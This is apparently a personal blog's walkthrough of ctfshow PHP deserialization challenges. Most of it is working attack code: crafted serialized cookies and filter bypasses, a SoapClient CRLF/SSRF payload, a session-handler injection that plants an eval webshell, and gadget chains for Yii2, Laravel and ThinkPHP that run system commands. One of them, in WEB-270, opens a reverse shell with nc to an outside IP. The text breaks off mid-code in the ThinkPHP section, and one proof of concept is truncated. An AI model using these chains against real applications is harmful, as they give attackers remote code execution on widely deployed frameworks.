Z1d10tのBlog

A note for myself, have fun!

  1. WEB-254
  2. WEB-255
  3. WEB-256
  4. WEB-257
  5. WEB-258
  6. WEB-259 (SoapClient)
  7. WEB-262, 264 (deserialization string escape)
  8. WEB-263 (PHP session serialization)
  9. WEB-265 (reference operator)
  10. WEB-266
  11. WEB-267 (Yii2 deserialization chain)
  12. WEB-268 (Yii2 deserialization chain)
  13. WEB-269 (Yii2 deserialization chain)
  14. WEB-270 (Yii2 deserialization chain)
  15. WEB-271 (Laravel 5.7 deserialization)
  16. WEB-272~273 (Laravel 5.8 deserialization)
  17. WEB-274 (ThinkPHP 5.1 deserialization)
  18. WEB-275
  19. WEB-276 (phar deserialization)
  20. WEB-277, 288 (Python)
  21. Closing notes

ctfshow - Deserialization

WEB-254

Just read the code; this one has nothing to do with deserialization. Make the condition hold and you get the flag.

payload: ?username=xxxxxx&password=xxxxxx

WEB-255

Pass a serialized object through the cookie so that $isVip=true.

poc:

<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=true;
}

$a = new ctfShowUser();
echo urlencode(serialize($a));
?>

Then send the following request:

GET /?username=xxxxxx&password=xxxxxx HTTP/1.1
Host: b1e5d003-80d4-4a98-b405-4ce5b5c72282.challenge.ctf.show
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
referer: http://b1e5d003-80d4-4a98-b405-4ce5b5c72282.challenge.ctf.show/
Connection: close

WEB-256

Same as the previous challenge, except that username and password must now differ; again set them through the deserialized object.

poc: better not to use numeric values here, or it won't go through ($_GET values are always strings, so an integer property fails a strict comparison).

<?php
class ctfShowUser{
    public $username='a';
    public $password='xxxxxx';
    public $isVip=true;
}

$a = new ctfShowUser();
echo urlencode(serialize($a));
?>

Request:

GET /?username=a&password=xxxxxx HTTP/1.1
Host: d4976ed7-1dae-4590-a624-a16d69c89609.challenge.ctf.show
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%22a%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
Connection: close

WEB-257

Approach: ctfShowUser::__destruct() -> backDoor::getInfo()

Overwrite the private $class property in the constructor so that the destructor's getInfo() call lands on a backDoor object carrying our $code.

poc:

<?php
class ctfShowUser{
    public $username='a';
    public $password='xxxxxx';
    public $isVip=true;
    private $class;
    public function __construct(){
        $this->class=new backDoor();
    }
}
class info{
    private $user='xxxxxx';
}
class backDoor{
    private $code='system("cat flag.php");';
}

$a = new ctfShowUser();
echo urlencode(serialize($a));
?>

Request (note the %00ctfShowUser%00class in the cookie: a private property is serialized under the mangled name \0ClassName\0property, which is why that name has length 18 rather than 5):

GET /?username=xxxxxx&password=xxxxxx HTTP/1.1
Host: 7aa30d0e-43ad-4b97-85fe-c4c15056de6d.challenge.ctf.show
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user=O%3A11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%22a%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A23%3A%22system%28%22cat+flag.php%22%29%3B%22%3B%7D%7D
referer: http://7aa30d0e-43ad-4b97-85fe-c4c15056de6d.challenge.ctf.show/
Connection: close

WEB-258

One extra check this time: !preg_match('/[oc]:\d+:/i', $_COOKIE['user'])

In other words the cookie must not contain o: or c: followed directly by digits, which is exactly what the header of a serialized object (O:11:"ctfShowUser") looks like.

The bypass is to put a + in front of each length: the regex needs a digit right after the colon, but unserialize() on the challenge's PHP version reads the length with a signed-number parser, so O:+11:"ctfShowUser" still deserializes.

The poc is the same as the previous challenge, just add the two + signs by hand:

O:+11:"ctfShowUser":4:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";s:5:"isVip";b:1;s:5:"class";O:+8:"backDoor":1:{s:4:"code";s:23:"system("cat flag.php");";}}

URL-encode it before submitting (the + must become %2B): PHP decodes a bare + in a cookie value as a space, which would break the payload.
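As an added example (not from the original writeup), the script below takes a WEB-257 style payload, shows the challenge's filter rejecting it, rewrites every O:/C: length with a leading + and URL-encodes the result. The classes mirror the POC above with public properties; the regex is the one quoted from the challenge. Whether unserialize() accepts the signed length depends on the PHP build, so the last line is a local sanity check to compare against the target's version.

```php
<?php
// Added example, not part of the original writeup. Only the filter regex is
// taken from the challenge; the classes mirror the WEB-257 POC with public
// properties, and the final unserialize() check is a local sanity test whose
// result depends on the PHP version in use.

class backDoor {
    public $code = 'system("cat flag.php");';
}

class ctfShowUser {
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
    public $isVip    = true;
    public $class;
    public function __construct() {
        $this->class = new backDoor();
    }
}

// The check from the challenge: reject "o:<digits>:" and "c:<digits>:" (case-insensitive).
function blocked(string $cookie): bool {
    return preg_match('/[oc]:\d+:/i', $cookie) === 1;
}

// Insert a '+' between the O:/C: marker and its length so the regex no longer
// sees a digit directly after the colon. unserialize() reads the length with a
// signed-number parser, which is what makes O:+11: equivalent to O:11:.
function plus_bypass(string $serialized): string {
    return preg_replace('/\b([OC]):(\d+):/', '$1:+$2:', $serialized);
}

$plain  = serialize(new ctfShowUser());
$bypass = plus_bypass($plain);

echo "plain rejected:  ", var_export(blocked($plain), true), "\n";
echo "bypass rejected: ", var_export(blocked($bypass), true), "\n";

// PHP decodes a bare '+' in a cookie value to a space, so percent-encode it (%2B).
echo "Cookie: user=", urlencode($bypass), "\n";

// Local check: does this interpreter still parse the signed length?
$obj = @unserialize($bypass);
echo "parsed locally:  ", var_export($obj instanceof ctfShowUser && $obj->class instanceof backDoor, true), "\n";
```

Run it with the same PHP version as the target before relying on the trick: the regex part is deterministic, the unserialize() part is not.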

WEB-259 (SoapClient)

SoapClient uses HTTP as its transport and XML as the message format.

Having read the writeups, the challenge comes down to SoapClient's __call magic method: the SoapClient object has no getFlag() method, so calling it falls through to

__call($func,$args)

where $func is the name of the missing method and $args is an array of the arguments. For SoapClient, __call means "send a SOAP request over HTTP to the configured location".

The main obstacle is that we cannot simply request /flag ourselves with X-Forwarded-For set to 127.0.0.1 to satisfy the check.

So we use this built-in class together with CRLF injection (the user_agent option is written straight into the request headers) to have the server forge the request itself and get the flag written into flag.txt.

That is my understanding of it.

Reference: https://www.xiinnn.com/article/7741c455.html, which explains it in detail.

poc (borrowed from that post):

<?php
?>';
echo urlencode(serialize($a))
?>
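An added example of the mechanism (not the writeup's POC, which is incomplete above): SoapClient copies the user_agent option verbatim into the User-Agent header of the request that __call() sends, so CRLF sequences let us append our own headers and a body. Requires ext-soap. The target URL, the X-Forwarded-For header and the POST body are placeholders for whatever the challenge actually checks.

```php
<?php
// Added example, not the writeup's POC. It shows the mechanics the text
// describes: SoapClient writes the user_agent option verbatim into the
// "User-Agent:" header of the request that __call() sends, so CRLF sequences
// in it let us append headers and a body of our own. The target URL, the
// injected header and the POST body are placeholders standing in for whatever
// the challenge actually checks.

function soap_ssrf_payload(string $location, array $headers, string $body): string {
    // Close the real User-Agent line, add our headers, a blank line, then the body.
    // Content-Length covers only our body, so the SOAP envelope that SoapClient
    // appends afterwards ends up past the request the server reads.
    $ua = "Mozilla/5.0\r\n";
    foreach ($headers as $name => $value) {
        $ua .= $name . ': ' . $value . "\r\n";
    }
    $ua .= "Content-Type: application/x-www-form-urlencoded\r\n"
         . 'Content-Length: ' . strlen($body) . "\r\n"
         . "\r\n"
         . $body;

    $client = new SoapClient(null, [
        'location'   => $location,           // where __call() will POST
        'uri'        => 'http://127.0.0.1/', // required in non-WSDL mode, value irrelevant here
        'user_agent' => $ua,
    ]);
    return serialize($client);
}

// Assumed values: an internal endpoint that trusts X-Forwarded-For, and a form body.
$payload = soap_ssrf_payload(
    'http://127.0.0.1/flag.php',
    ['X-Forwarded-For' => '127.0.0.1'],
    'token=ctfshow'
);

echo urlencode($payload), "\n";
// Once the server unserializes this and calls any undefined method (e.g. getFlag()),
// SoapClient::__call() sends the forged request from the server itself.
```

The only part that does real work is the user_agent string; everything after the first \r\n\r\n in it is the body the internal server sees, and Content-Length must match it exactly or the server will read into the SOAP envelope.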

WEB-262, 264 (deserialization string escape)

A character replacement applied after serialization is a dead giveaway: this is string escape.

What the challenge does is serialize what we submit, run the replacement, and then deserialize the result.

A small demo to see how it works:

<?php
class message{
    public $from=1;
    public $msg=1;
    // 27 copies of "fuck": each grows by one byte when replaced with "loveU",
    // freeing exactly the 27 bytes of the injected tail
    public $to='fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}';
    public $token='user';
}
$a = new message();
$b = serialize($a);
echo $b;
echo "\n";
print_r(unserialize(str_replace('fuck', 'loveU', $b)));
?>

payload: ?f=1&m=1&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck%22%3Bs%3A5%3A%22token%22%3Bs%3A5%3A%22admin%22%3B%7D

Then save the cookie, visit /message with that cookie and you get the flag.
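The arithmetic behind the 27 copies, as an added example that is not from the original writeup: given the filter (fuck -> loveU, one byte longer) and the members to inject, compute the filler count, build the value, and run it through the same serialize / replace / unserialize round trip the challenge performs. The message class is the one from the demo above.

```php
<?php
// Added example, not from the original writeup. Given the filter (fuck -> loveU,
// one byte longer) and the members we want to inject, work out how many filler
// copies are needed, build the value, run it through the same serialize /
// replace / unserialize round trip as the challenge, and check the result.
// The message class is the one from the demo above.

class message {
    public $from;
    public $msg;
    public $to;
    public $token = 'user';
    public function __construct($from, $msg, $to) {
        $this->from = $from;
        $this->msg  = $msg;
        $this->to   = $to;
    }
}

// Model of the server side: serialize the user's message, then apply the filter.
function app_filter(string $serialized): string {
    return str_replace('fuck', 'loveU', $serialized);
}

// Each filler grows by $grow bytes after replacement. The declared length of
// $to stays what it was at serialize() time, so after the replacement the
// parser stops $grow * copies bytes early, and the injected tail is read as
// new members of the object.
function escape_value(string $filler, string $replacement, string $inject): string {
    $grow = strlen($replacement) - strlen($filler);
    if ($grow <= 0) {
        throw new InvalidArgumentException('replacement must be longer than the filler');
    }
    if (strlen($inject) % $grow !== 0) {
        // pad the injected string (e.g. with a dummy member) until it is a multiple of $grow
        throw new InvalidArgumentException('injection length must be a multiple of the growth');
    }
    return str_repeat($filler, intdiv(strlen($inject), $grow)) . $inject;
}

// Closes the "to" string, adds token=admin, and closes the object; whatever the
// server appends after this (the real token) is trailing data that unserialize()
// ignores.
$inject = '";s:5:"token";s:5:"admin";}';
$to     = escape_value('fuck', 'loveU', $inject);

$stored = app_filter(serialize(new message(1, 1, $to)));
$result = unserialize($stored);

echo "filler copies: ", substr_count($to, 'fuck'), "\n";
echo "token after round trip: ", $result->token, "\n";
echo "GET payload: ?f=1&m=1&t=", urlencode($to), "\n";
```

The same function covers the reverse case only in principle: when the replacement is shorter than the filler the string shrinks and the injection has to come from a later member, so escape_value() refuses it rather than silently producing a broken payload.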

WEB-263 (PHP session serialization)

Source leak at /www.zip.

My biggest puzzle at first was where the serialized content we submit actually gets deserialized.

The writeups online all say the same thing and nobody mentions it.

In the end I never fully worked it out; my feeling is that only this session engine does it, so that is how I understood it.

First look at: ini_set('session.serialize_handler', 'php'); reference: https://blog.spoock.com/2016/10/16/php-serialize-problem/

session.serialize_handler selects the session serialization engine. Besides the default php engine there are others, and each stores session data in its own format:

  • php_binary: an ASCII character whose code is the key length + the key + the serialize()d value
  • php: the key + | + the serialize()d value
  • php_serialize (PHP >= 5.5.4): the whole session array as one serialize()d value

So the basic idea is that we control what goes into the session, and therefore what gets serialized and deserialized.

In inc.php there is:

class User{
    public $username;
    public $password;
    public $status;
    function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    function setStatus($s){
        $this->status=$s;
    }
    function __destruct(){
        file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
    }
}

Its destructor is our injection point: it writes a file named log-<username> whose content includes <password>.

Because this challenge uses the default engine, the php handler splits a session record at | into key and value, the value being a serialize() result. Everything before the first | is taken as the key and everything after it is passed to unserialize(), so a value that begins with | hands our serialized object straight to unserialize() when the record is read with the php handler.

poc:

<?php
class User{
    public $username;
    public $password;
    public $status;
    function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new User('1.php', '<?php @eval($_POST[x]);?>');
echo base64_encode('|'.serialize($a));
#fE86NDoiVXNlciI6Mzp7czo4OiJ1c2VybmFtZSI7czo1OiIxLnBocCI7czo4OiJwYXNzd29yZCI7czoyNToiPD9waHAgQGV2YWwoJF9QT1NUW3hdKTs/PiI7czo2OiJzdGF0dXMiO047fQ==
?>

Visit index.php with Cookie: limit=<the base64 above>, then visit check.php.

Then request our webshell, log-1.php.

RCE done.
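An added example (not from the original writeup) of why the leading | matters: it models the classic handler mismatch, where data written as one serialize()d array by the php_serialize handler is later read by the php handler, which splits the record at | into key and serialize()d value. The User class here is a stand-in whose destructor only prints what the real one in inc.php would write to disk; the serialized object is exactly what the POC's base64 decodes to.

```php
<?php
// Added example, not from the original writeup. It models the handler mismatch
// that makes a leading '|' dangerous: data written as one serialize()d array
// (php_serialize handler) is later read by the php handler, which splits each
// record at '|' into key and serialize()d value. The User class here is a
// stand-in whose destructor only prints what the real one in inc.php would
// write to disk.

class User {
    public $username;
    public $password;
    public $status;
    function __construct($username, $password) {
        $this->username = $username;
        $this->password = $password;
    }
    function __destruct() {
        echo "__destruct: would write log-{$this->username} containing {$this->password}\n";
    }
}

// What the php_serialize handler stores for $_SESSION['limit'] = $data.
function store_php_serialize(string $data): string {
    return serialize(['limit' => $data]);
}

// A minimal model of the php handler's reader: bytes up to the first '|' are
// the key, what follows is passed to unserialize(). The real handler stops at
// the end of the serialized value; here the leftover bytes of the outer array
// are simply ignored as trailing data.
function load_php_handler(string $record): array {
    $pos = strpos($record, '|');
    if ($pos === false) {
        return [];
    }
    $key   = substr($record, 0, $pos);
    $value = @unserialize(substr($record, $pos + 1));
    return [$key => $value];
}

// The decoded Cookie: limit value from the POC above: a '|' followed by the object.
$malicious = '|O:4:"User":3:{s:8:"username";s:5:"1.php";s:8:"password";s:25:"<?php @eval($_POST[x]);?>";s:6:"status";N;}';

$record  = store_php_serialize($malicious);  // written with php_serialize
$session = load_php_handler($record);        // read back with php

foreach ($session as $key => $value) {
    echo "session key:   ", var_export($key, true), "\n";
    echo "session value: ", is_object($value) ? get_class($value) : gettype($value), "\n";
}
// When the script ends, the User object in $session is destroyed and its
// destructor runs: this is the point where the real class writes log-1.php.
```

The session key ends up being the junk prefix of the php_serialize array (a:1:{s:5:"limit";s:...:") and the value is a live User object, which is all the destructor needs.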

WEB-265 (reference operator)

At first I couldn't see a way past the random-number function; I read the wp, the masters are strong.

It uses & to take a reference: after $a=&$b, whenever b changes a follows. In the serialized output this shows up as R:2;, a reference to the second value (the object itself counts as the first), so password stays identical to token whatever token is later set to.

poc:

<?php
class ctfshowAdmin{
    public $token;
    public $password;
    public function __construct(){
        $this->token='a';
        $this->password =&$this->token;
    }
}
$a=new ctfshowAdmin();
echo urlencode(serialize($a));
#O%3A12%3A%22ctfshowAdmin%22%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A1%3A%22a%22%3Bs%3A8%3A%22password%22%3BR%3A2%3B%7D
?>
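An added example (not from the original writeup) of what R:2; does after unserialize(). The check it defeats is modelled here as a token regenerated with mt_rand() and then compared with password, which is how the text describes the obstacle; the class is the one from the POC.

```php
<?php
// Added example, not from the original writeup. It shows what the R:2; in the
// POC's output does after unserialize(), and models the check it defeats as a
// token regenerated with mt_rand() and then compared against password.

class ctfshowAdmin {
    public $token;
    public $password;
}

// R:<n> refers to the n-th value in the serialized data, counting the outer
// object as 1 and token as 2, and it produces a PHP reference, not a copy:
// password and token share one value slot.
$payload = 'O:12:"ctfshowAdmin":2:{s:5:"token";s:1:"a";s:8:"password";R:2;}';
$admin   = unserialize($payload);

// Model of the server: replace the token with something we cannot predict...
$admin->token = md5(mt_rand());
// ...and password still matches, because writing to token writes through the reference.
echo "referenced: ", var_export($admin->password === $admin->token, true), "\n";

// For comparison, a payload that merely copies the value:
$copy = unserialize('O:12:"ctfshowAdmin":2:{s:5:"token";s:1:"a";s:8:"password";s:1:"a";}');
$copy->token = md5(mt_rand());
echo "copied:     ", var_export($copy->password === $copy->token, true), "\n";
```

Lower-case r:<n> would instead produce an object handle copy, which does not track later assignments; only upper-case R: creates the alias.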

WEB-266

This one just needs a case change in the class name to get past the regex (PHP class names are case-insensitive, so Ctfshow still instantiates ctfshow):

GET / HTTP/1.1
Host: 0df5fa90-8128-463c-b40b-12ed31c48ad8.challenge.ctf.show
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 18

O:7:"Ctfshow":0:{}

WEB-267 (Yii2 deserialization chain)

Yii2 is a PHP framework; just pick up a ready-made chain poc from the internet.

First log in with the weak credentials admin/admin, then look at About.

It hints at visiting ?r=site%2Fabout&view-source

Viewing the source there reveals Yii2; since this is the deserialization module, go straight for a gadget chain.

The poc I found for this one only works with passthru; other functions wouldn't work, which is rather odd.

poc below. Reference: https://www.anquanke.com/post/id/254429. If one of its chains doesn't work, just swap in another.

The chain: BatchQueryResult::__destruct() -> reset() -> $_dataReader->close() -> Faker\Generator::__call('close') -> formatters['close'] -> CreateAction::run() -> call_user_func($this->checkAccess, $this->id), i.e. passthru('cat /flag').

<?php

namespace yii\rest {
    class CreateAction {
        public $id;
        public $checkAccess;
        public function __construct() {
            $this->id = 'cat /flag';
            $this->checkAccess = 'passthru';
        }
    }
}

namespace Faker {
    use yii\rest\CreateAction;
    class Generator {
        protected $formatters;
        public function __construct() {
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}

namespace yii\db {
    use Faker\Generator;
    class BatchQueryResult {
        private $_dataReader;
        public function __construct() {
            $this->_dataReader = new Generator();
        }
    }
}

namespace {
    use yii\db\BatchQueryResult;
    echo base64_encode(serialize(new BatchQueryResult()));
}

payload:

?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoyOiJpZCI7czo5OiJjYXQgL2ZsYWciO3M6MTE6ImNoZWNrQWNjZXNzIjtzOjg6InBhc3N0aHJ1Ijt9aToxO3M6MzoicnVuIjt9fX19

WEB-268 (Yii2 deserialization chain)

The previous chain no longer works; switch to another one.

The chain: RunProcess::__destruct() -> stopProcess() -> $process->isRunning() -> Faker\Generator::__call('isRunning') -> CreateAction::run() -> passthru().

<?php

namespace yii\rest {
    class CreateAction {
        public $checkAccess;
        public $id;
        public function __construct() {
            $this->checkAccess="passthru";
            $this->id="cat /flags";
        }
    }
}

namespace Faker {
    use yii\rest\CreateAction;
    class Generator {
        protected $formatters;
        public function __construct() {
            $this->formatters['isRunning'] = [new CreateAction(), 'run'];
        }
    }
}

namespace Codeception\Extension {
    use Faker\Generator;
    class RunProcess {
        private $processes;
        public function __construct() {
            $this->processes = [new Generator()];
        }
    }
}

namespace {
    use Codeception\Extension\RunProcess;
    echo base64_encode(serialize(new RunProcess()));
}

WEB-269 (Yii2 deserialization chain)

Switch again.

The chain: Swift_KeyCache_DiskKeyCache::__destruct() -> clearAll('axin') -> clearKey('axin', 'is') -> string concatenation on $this->path -> See::__toString() -> $description->render() -> Faker\Generator::__call('render') -> CreateAction::run(). The nested keys array is what makes clearAll() reach clearKey() and touch $this->path.

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'passthru';
            $this->id = 'cat /flagsa';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            // the key must be the method See::__toString() calls on $description: render
            $this->formatters['render'] = [new CreateAction(), 'run'];
        }
    }
}

namespace phpDocumentor\Reflection\DocBlock\Tags{

    use Faker\Generator;

    class See{
        protected $description;
        public function __construct()
        {
            $this->description = new Generator();
        }
    }
}
namespace{
    use phpDocumentor\Reflection\DocBlock\Tags\See;
    class Swift_KeyCache_DiskKeyCache{
        private $keys = [];
        private $path;
        public function __construct()
        {
            $this->path = new See;
            $this->keys = array(
                "axin"=>array("is"=>"handsome")
            );
        }
    }
    // generate the poc
    echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
}

WEB-270 (Yii2 deserialization chain)

This time with a reverse shell.

The chain: BatchQueryResult::__destruct() -> $_dataReader->close() -> DbSession::close() -> composeFields() -> call_user_func($this->writeCallback, $this) -> IndexAction::run() -> call_user_func($this->checkAccess, $this->id), i.e. shell_exec('nc ...').

<?php
namespace yii\rest {
    class Action
    {
        public $checkAccess;
    }
    class IndexAction extends Action
    {
        public $id;
        public function __construct($func, $param)
        {
            $this->checkAccess = $func;
            $this->id = $param;
        }
    }
}
namespace yii\web {
    abstract class MultiFieldSession
    {
        public $writeCallback;
    }
    class DbSession extends MultiFieldSession
    {
        public function __construct($func, $param)
        {
            $this->writeCallback = [new \yii\rest\IndexAction($func, $param), "run"];
        }
    }
}
namespace yii\db {
    class BatchQueryResult
    {
        private $_dataReader;
        public function __construct($func, $param)
        {
            $this->_dataReader = new \yii\web\DbSession($func, $param);
        }
    }
}
namespace {
    $exp = new \yii\db\BatchQueryResult('shell_exec', 'nc 8.130.34.53 7777 -e /bin/sh');
    echo base64_encode(serialize($exp));
}

WEB-271 (Laravel 5.7 deserialization)

Just borrow a chain from the internet.

Reference: https://xz.aliyun.com/t/10578#toc-3

The chain: PendingCommand::__destruct() -> run() -> mockConsoleOutput() (the Faker DefaultGenerator absorbs every call made on $test) -> $this->app[Kernel::class]->call($this->command, $this->parameters) -> the nested Application's call() -> system('cat /flag').

<?php

namespace Illuminate\Foundation\Testing {
    class PendingCommand
    {
        protected $command;
        protected $parameters;
        public $test;
        protected $app;
        public function __construct($test, $app, $command, $parameters)
        {
            $this->app = $app;
            $this->test = $test;
            $this->command = $command;
            $this->parameters = $parameters;
        }
    }
}

namespace Faker {
    class DefaultGenerator
    {
        protected $default;

        public function __construct($default = null)
        {
            $this->default = $default;
        }
    }
}

namespace Illuminate\Foundation {
    class Application
    {
        protected $instances = [];

        public function __construct($instances = [])
        {
            $this->instances['Illuminate\Contracts\Console\Kernel'] = $instances;
        }
    }
}

namespace {
    $defaultgenerator = new Faker\DefaultGenerator(array("DawnT0wn" => "1"));
    $app = new Illuminate\Foundation\Application();
    $application = new Illuminate\Foundation\Application($app);
    $pendingcommand = new Illuminate\Foundation\Testing\PendingCommand($defaultgenerator, $application, "system", array("cat /flag"));
    echo urlencode(serialize($pendingcommand));
}

post:data=O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7Ds%3A4%3A%22test%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Ba%3A1%3A%7Bs%3A8%3A%22DawnT0wn%22%3Bs%3A1%3A%221%22%3B%7D%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A1%3A%7Bs%3A12%3A%22%00%2A%00instances%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A1%3A%7Bs%3A12%3A%22%00%2A%00instances%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A0%3A%7B%7D%7D%7D%7D%7D%7D

WEB-272~273 (Laravel 5.8 deserialization)

poc below. Reference: https://blog.csdn.net/qq_61991235/article/details/123583489

The chain: PendingBroadcast::__destruct() -> $events->dispatch($event) -> Bus\Dispatcher::dispatchToQueue() -> call_user_func($this->queueResolver, $command->connection) -> EvalLoader::load($mockDefinition) -> eval('?>' . $definition->getCode()).

<?php
namespace Illuminate\Broadcasting{

    use Illuminate\Bus\Dispatcher;
    use Illuminate\Foundation\Console\QueuedCommand;

    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct(){
            $this->events=new Dispatcher();
            $this->event=new QueuedCommand();
        }
    }
}
namespace Illuminate\Foundation\Console{
    use Mockery\Generator\MockDefinition;
    class QueuedCommand
    {
        public $connection;
        public function __construct()
        {
            $this->connection=new MockDefinition();
        }
    }
}

namespace Mockery\Generator{

    class MockDefinition{
        protected $config;
        protected $code;
        public function __construct()
        {
            $this->code="<?php echo system('cat /flag'); exit(); ?>";
            $this->config=new MockConfiguration();
        }
    }
    class MockConfiguration{

    }
}

namespace Illuminate\Bus{
    use Mockery\Loader\EvalLoader;
    class Dispatcher
    {
        protected $queueResolver;
        public function __construct()
        {
            // a callable in array form: [object, method]
            $this->queueResolver=[new EvalLoader(),'load'];
        }
    }
}

namespace Mockery\Loader{
    class EvalLoader{

    }
}

namespace{

    use Illuminate\Broadcasting\PendingBroadcast;

    echo urlencode(serialize(new PendingBroadcast()));
}

post:data=O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A25%3A%22Illuminate%5CBus%5CDispatcher%22%3A1%3A%7Bs%3A16%3A%22%00%2A%00queueResolver%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22Mockery%5CLoader%5CEvalLoader%22%3A0%3A%7B%7Di%3A1%3Bs%3A4%3A%22load%22%3B%7D%7Ds%3A8%3A%22%00%2A%00event%22%3BO%3A43%3A%22Illuminate%5CFoundation%5CConsole%5CQueuedCommand%22%3A1%3A%7Bs%3A10%3A%22connection%22%3BO%3A32%3A%22Mockery%5CGenerator%5CMockDefinition%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00config%22%3BO%3A35%3A%22Mockery%5CGenerator%5CMockConfiguration%22%3A0%3A%7B%7Ds%3A7%3A%22%00%2A%00code%22%3Bs%3A42%3A%22%3C%3Fphp+echo+system%28%27cat+%2Fflag%27%29%3B+exit%28%29%3B+%3F%3E%22%3B%7D%7D%7D

WEB-274 (ThinkPHP 5.1 deserialization)

The interface is instantly familiar: a dead giveaway for ThinkPHP.

The chain: Windows::__destruct() -> removeFiles() -> file_exists($pivot) -> Model::__toString() -> toJson()/toArray() -> $relation->visible(...) on the Request object stored in $data -> Request::__call('visible') -> hook -> isAjax() -> param($this->config['var_ajax']) -> input() -> filterValue() -> call_user_func($this->filter, $value), i.e. system() run over the request parameters, hence &shell=cat /flag.

<?php
namespace think;
abstract class Model{
    protected $append = [];
    private $data = [];
    function __construct(){
        $this->append = ["ethan"=>["dir","calc"]];
        $this->data = ["ethan"=>new Request()];
    }
}
class Request
{
    protected $hook = [];
    protected $filter = "system";
    protected $config = [
